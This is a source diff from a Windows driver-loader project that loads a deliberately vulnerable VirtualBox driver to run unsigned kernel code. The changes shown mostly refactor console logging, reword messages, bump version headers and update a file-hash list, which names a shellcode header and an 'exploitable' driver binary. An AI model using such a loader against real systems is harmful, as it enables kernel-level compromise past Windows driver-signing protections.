cuiPrintText(TEXT("SCM: VBoxNetLwf driver unloaded"), TRUE);
}
if (scmStopDriver(schSCManager, TEXT("VBoxUSBMon"))) {
cuiPrintText(g_ConOut,
TEXT("SCM: VBoxUSBMon driver unloaded"),
g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("SCM: VBoxUSBMon driver unloaded"), TRUE);
}
Sleep(1000);
if (scmStopDriver(schSCManager, TEXT("VBoxDrv"))) {
cuiPrintText(g_ConOut,
TEXT("SCM: VBoxDrv driver unloaded"),
g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("SCM: VBoxDrv driver unloaded"), TRUE);
}
}
@ -623,9 +613,10 @@ HANDLE TDLStartVulnerableDriver(
//
if (g_VBoxInstalled) {
if (supBackupVBoxDrv(FALSE) == FALSE) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Error while doing VirtualBox driver backup"),
g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: Error while doing VirtualBox driver backup"), TRUE);
}
else {
cuiPrintText(TEXT("Ldr: VirtualBox driver backup done"), TRUE);
}
}
@ -635,11 +626,7 @@ HANDLE TDLStartVulnerableDriver(
(SIZE_T)DataSize, FALSE, FALSE);
if (bytesIO != DataSize) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Error writing VirtualBox on disk"),
g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("Ldr: Error writing VirtualBox on disk"), TRUE);
break;
}
@ -661,7 +648,7 @@ HANDLE TDLStartVulnerableDriver(
msg = TEXT("SCM: Vulnerable driver load failure");
}
cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE);
cuiPrintText(msg, TRUE);
break;
}
@ -689,9 +676,7 @@ void TDLStopVulnerableDriver(
UNICODE_STRING uStr;
OBJECT_ATTRIBUTES ObjectAttributes;
cuiPrintText(g_ConOut,
TEXT("SCM: Unloading vulnerable driver"),
g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("SCM: Unloading vulnerable driver"), TRUE);
if (g_hVBox != INVALID_HANDLE_VALUE)
CloseHandle(g_hVBox);
@ -702,9 +687,7 @@ void TDLStopVulnerableDriver(
);
if (schSCManager == NULL) {
cuiPrintText(g_ConOut,
TEXT("SCM: Cannot open database, unable unload driver"),
g_ConsoleOutput, TRUE);
cuiPrintText(TEXT("SCM: Cannot open database, unable unload driver"), TRUE);
return;
}
@ -714,7 +697,7 @@ void TDLStopVulnerableDriver(
else
msg = TEXT("SCM: Unexpected error while unloading driver");
cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE);
cuiPrintText(msg, TRUE);
//if VBox not installed - remove from scm database and delete file
if (g_VBoxInstalled == FALSE) {
@ -724,7 +707,7 @@ void TDLStopVulnerableDriver(
else
msg = TEXT("SCM: Error removing driver entry from registry");
cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE);
cuiPrintText(msg, TRUE);
uStr.Buffer = NULL;
uStr.Length = 0;
@ -736,17 +719,17 @@ void TDLStopVulnerableDriver(
else
msg = TEXT("Ldr: Error removing driver file");
cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE);
cuiPrintText(msg, TRUE);
}
else {
//VBox software present, restore original driver and exit
if (supBackupVBoxDrv(TRUE))
msg = TEXT("Ldr: Original driver restored");
msg = TEXT("Ldr: Original VirtualBox driver restored from backup");
else
msg = TEXT("Ldr: Unexpected error while restoring original driver");
msg = TEXT("Ldr: Unexpected error while restoring original driver from backup");
cuiPrintText(g_ConOut, msg, g_ConsoleOutput, TRUE);
cuiPrintText(msg, TRUE);
}
CloseServiceHandle(schSCManager);
}
@ -772,9 +755,7 @@ UINT TDLProcessCommandLine(
RtlSecureZeroMemory(szInputFile, sizeof(szInputFile));
GetCommandLineParam(lpCommandLine, 1, (LPWSTR)&szInputFile, MAX_PATH, &c);
if (c == 0) {
cuiPrintText(g_ConOut,
T_LOADERUSAGE,
g_ConsoleOutput, FALSE);
cuiPrintText(T_LOADERUSAGE, FALSE);
return retVal;
}
@ -786,9 +767,7 @@ UINT TDLProcessCommandLine(
}
}
else {
cuiPrintText(g_ConOut,
TEXT("Ldr: Input file not found"),
g_ConsoleOutput, FALSE);
cuiPrintText(TEXT("Ldr: Input file not found"), FALSE);
}
return retVal;
}
@ -806,43 +785,23 @@ void TDLMain()
BOOL cond = FALSE;
UINT uResult = 0;
DWORD dwTemp;
LONG x;
OSVERSIONINFO osv;
WCHAR text[256];
__security_init_cookie();
do {
g_hInstance = GetModuleHandle(NULL);
g_ConOut = GetStdHandle(STD_OUTPUT_HANDLE);
if (g_ConOut == INVALID_HANDLE_VALUE) {
uResult = (UINT)-1;
break;
}
g_ConsoleOutput = TRUE;
if (!GetConsoleMode(g_ConOut, &dwTemp)) {
g_ConsoleOutput = FALSE;
}
cuiInitialize(FALSE, NULL);
SetConsoleTitle(T_LOADERTITLE);
SetConsoleMode(g_ConOut, ENABLE_LINE_INPUT | ENABLE_ECHO_INPUT | ENABLE_PROCESSED_OUTPUT);
if (g_ConsoleOutput == FALSE) {
WriteFile(g_ConOut, &g_BE, sizeof(WCHAR), &dwTemp, NULL);
}
cuiPrintText(g_ConOut,
T_LOADERINTRO,
g_ConsoleOutput, TRUE);
cuiPrintText(T_LOADERINTRO, TRUE);
x = InterlockedIncrement((PLONG)&g_lApplicationInstances);
if (x > 1) {
cuiPrintText(g_ConOut,
T_LOADERRUN,
g_ConsoleOutput, FALSE);
cuiPrintText(T_LOADERRUN, FALSE);
uResult = (UINT)-1;
break;
}
@ -852,9 +811,7 @@ void TDLMain()
osv.dwOSVersionInfoSize = sizeof(osv);
RtlGetVersion((PRTL_OSVERSIONINFOW)&osv);
if (osv.dwMajorVersion < 6) {
cuiPrintText(g_ConOut,
T_LOADERUNSUP,
g_ConsoleOutput, FALSE);
cuiPrintText(T_LOADERUNSUP, FALSE);
uResult = (UINT)-1;
break;
}
@ -867,19 +824,16 @@ void TDLMain()
ultostr(osv.dwMinorVersion, _strend(text));
_strcat(text, TEXT(" build "));
ultostr(osv.dwBuildNumber, _strend(text));
cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE);
#if 0
cuiPrintText(text, TRUE);
//
// If VirtualBox installed on the same machine warn user,
// however this is unnecessary can lead to any conflicts.
//
g_VBoxInstalled = TDLVBoxInstalled();
if (g_VBoxInstalled) {
cuiPrintText(g_ConOut,
TEXT("Ldr: Warning, VirtualBox software installed, conflicts are possible"),
g_ConsoleOutput, TRUE);
cuiPrintText(T_VBOXDETECT, TRUE);
}
#endif
uResult = TDLProcessCommandLine(GetCommandLine());

8682
Source/Furutaka/ntos.h
View File

File diff suppressed because it is too large Load Diff

BIN
Source/Furutaka/resource.rc
View File

Binary file not shown.

12
Source/Furutaka/sup.c
View File

@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2016 - 2017
* (C) COPYRIGHT AUTHORS, 2016 - 2019
*
* TITLE: SUP.C
*
* VERSION: 1.12
* VERSION: 1.14
*
* DATE: 01 Dec 2017
* DATE: 05 Jan 2019
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
@ -80,7 +80,7 @@ ULONG_PTR supGetNtOsBase(
PRTL_PROCESS_MODULES miSpace;
ULONG_PTR NtOsBase = 0;
miSpace = supGetSystemInfo(SystemModuleInformation);
miSpace = (PRTL_PROCESS_MODULES)supGetSystemInfo(SystemModuleInformation);
while (miSpace != NULL) {
NtOsBase = (ULONG_PTR)miSpace->Modules[0].ImageBase;
RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, miSpace);
@ -117,7 +117,7 @@ PBYTE supQueryResourceData(
status = LdrFindResource_U(DllHandle, (ULONG_PTR*)&IdPath, 3, &DataEntry);
if (NT_SUCCESS(status)) {
status = LdrAccessResource(DllHandle, DataEntry, &Data, &SizeOfData);
status = LdrAccessResource(DllHandle, DataEntry, (PVOID*)&Data, &SizeOfData);
if (NT_SUCCESS(status)) {
if (DataSize) {
*DataSize = SizeOfData;
@ -364,7 +364,7 @@ NTSTATUS NTAPI supEnumSystemObjects(
if (status != STATUS_BUFFER_TOO_SMALL)
break;
objinf = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen);
objinf = (POBJECT_DIRECTORY_INFORMATION)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, rlen);
if (objinf == NULL)
break;

20
TDL.sha256
View File

@ -1,6 +1,6 @@
a761bbb4a1b7813132dc8d8ed526d24289dc603bc706da238e1f23d75dbd66aa *Compiled\dummy.sys
f6610691bc3b9f96dad8bfc00b3ceb939ebcb17844d1ca5ee26f8364944ca110 *Compiled\dummy2.sys
8663927eaf8a0ebd87750d7f36f3c191c729e69ac7a63743fa1a7a0408895c50 *Compiled\Furutaka.exe
0d1e0c1e14b614ed3b156d0f43ed7cdb872cb5b967ed70c0ba501e3cbc2daca2 *Compiled\Furutaka.exe
14eec2753d0e9b432c54c4a70fc59e3be75674313b6308a7a820e6682f775eb9 *Source\DummyDrv\dummy.sln
d61ebda2674d2db05a235478f89fed02c2de049b00ac5648fcebd4c4e638f71c *Source\DummyDrv\dummy\dummy.vcxproj
2d469aafdb7e37a2d58d4e7875abbfd27599762333cba8e28376c16fa7446e9c *Source\DummyDrv\dummy\dummy.vcxproj.filters
@ -13,21 +13,21 @@ d45cf40c855a135898e4b35d0b5b2d00e3ad251a97d3f47990248116f22ff45e *Source\DummyDr
1e73ce5b6b079e6986509c218ce0880536b37c505056f831989e73b835c1cbbc *Source\DummyDrv2\dummy\main.c
f0732da25aa6b0a64eb0ebfc730c0902ed6fd1cc51f43f66813adbc5283de6ec *Source\DummyDrv2\dummy\main.h
10b9fe09b9357cb3c35a00a8b09ae24141ec5941a37c461c2a296d822aa2b512 *Source\DummyDrv2\dummy\r3request.c
e25d0088a6c73c51243aac3a21e9384b24844e54f0a093d75fbf0ef44c2ff83d *Source\Furutaka\cui.c
6f145796c9bb2bd9413fe12926436c04cc0dd596be716d7423150299b39d02a0 *Source\Furutaka\cui.h
27b89ba25c1620f7f46af4a239d6a18b71b9b689ea33eb7ab099e0b039cdf21f *Source\Furutaka\cui.c
3058dea6894b1ca7bcff8896b35080c0ddfa1c541e7e505792cbac65dea9d0d9 *Source\Furutaka\cui.h
24bd86affa81071e8e4ba82368e6004ede1c4dd5234c21098c4e7563ee25721a *Source\Furutaka\Furutaka.sln
656a1ebfb8ca2b136b446d8bdeac9618d27ae1f6e06c08dee0d2fb8885b0e3a1 *Source\Furutaka\Furutaka.vcxproj
fa3af80e10c1824e99fcf2e4d5cec3cb4974d1eb35035f5a62fac67a44170c68 *Source\Furutaka\Furutaka.vcxproj
b28c810f46cd167ac65996dd850ac0743756a76a928ea445bb3d255d5200c5b7 *Source\Furutaka\Furutaka.vcxproj.filters
b4d5fe6532f439d6c1161b06dfe90a6bee063c003645204d31b678efd033ae51 *Source\Furutaka\Furutaka.vcxproj.user
9b9f412b442a3a328693af6f6be5bc3f00b0723e49012e6395d3d5eb9184b078 *Source\Furutaka\global.h
fc708eb26d32a785ab15f502140928985a1bd0113c0c9640eb25d6f2e0b4e7cd *Source\Furutaka\Furutaka.vcxproj.user
4b16411f96538d38f05b5d949710ace54839d4a9aee9dcc2a61a4b2f4dbfc9cc *Source\Furutaka\global.h
94cbbb81022dbd0205a3e7ede89775b43f9f45e934a3079fdb7f5217d8794fe0 *Source\Furutaka\instdrv.c
33b8666748f027ff93707e6e2a1b52303c3664399000ff18b4a8fe864b731640 *Source\Furutaka\instdrv.h
5b8be75beb30d40561a88a6a40e306bc5477f87c453fce8e5cb464d7bc2f63e9 *Source\Furutaka\main.c
b29970b67a406364e4a8fef971e48383de176229a9333168bd03caa474d19e3b *Source\Furutaka\ntos.h
64a8028d51454e2c831a81b68fcaf7348653830c010fb190451028c302f0574e *Source\Furutaka\main.c
d0debd4f7db2ef941f0b02e9d7d1b85d873f0a01dcb4537b5e112c68443aaaa6 *Source\Furutaka\ntos.h
fe6f865af4e22a2f7e1349891e935d7825caf08a06993d4e24d1596dab77963e *Source\Furutaka\resource.h
6bacf082d32cd5fcc5e787578614d871e88e5cbb5aa7161edcc4607c31a5657b *Source\Furutaka\resource.rc
530c157ddb971692aacd0252694a8a752f95c1759f6d8ae468477e0676a37d08 *Source\Furutaka\resource.rc
6f8ae02b3a6da025d5f918080e70245760d472dd5eb23fcc3964d425bee41336 *Source\Furutaka\shellcode.h
6ae8ca2192e5277e85a625c772092988592248dbaa444f385446202ea9e42eb5 *Source\Furutaka\sup.c
fe4cf565002d1b4a33b5f5fb81c656141f6bc758c94d861391e93a089515cbf8 *Source\Furutaka\sup.c
059014233efa8963d28b21f77aa37ae1c0ed3e152a9737ae8ec45338dee1d860 *Source\Furutaka\sup.h
12a9c986e4589a613e4d8e0e30a7bfa41191283a53b2eafab3483b0884a93d82 *Source\Furutaka\vbox.h
cf3a7d4285d65bf8688215407bce1b51d7c6b22497f09021f0fce31cbeb78986 *Source\Furutaka\drv\vboxdrv_exploitable.sys